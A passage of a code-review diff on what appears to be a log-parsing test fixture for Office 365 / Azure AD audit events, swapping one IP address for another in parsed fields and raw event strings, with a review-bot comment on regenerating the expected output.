"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -23261,9 +23261,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
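Review bot: The new address 67.43.156.15 is substituted by hand both in the parsed `o365audit.ActorIpAddress` / `ClientIP` fields and inside the `event.original` string, and the same substitution repeats in the @@ -23497, @@ -23527, @@ -23763, @@ -23793, @@ -24029 and @@ -24059 hunks; an expected-output fixture edited this way can silently drift from what the pipeline actually emits. If the ingest pipeline derives `source.ip`, `client.ip` or any `*.geo.*` enrichment from `ClientIP`, those entries also change with the new address and are outside this view, so the safer path is to regenerate the expected file from the updated raw input with `elastic-package test pipeline --generate` and compare that output against this commit. It would also help to record, in the data stream's test README or a comment beside the raw input, why only a fixed subset of public addresses is valid in these fixtures, so the next added event does not reintroduce an unsupported one.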
@@ -23497,7 +23497,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canar
y.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\
"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -23527,9 +23527,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:42",
 "ExtendedProperties": [
 {
@@ -23763,7 +23763,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
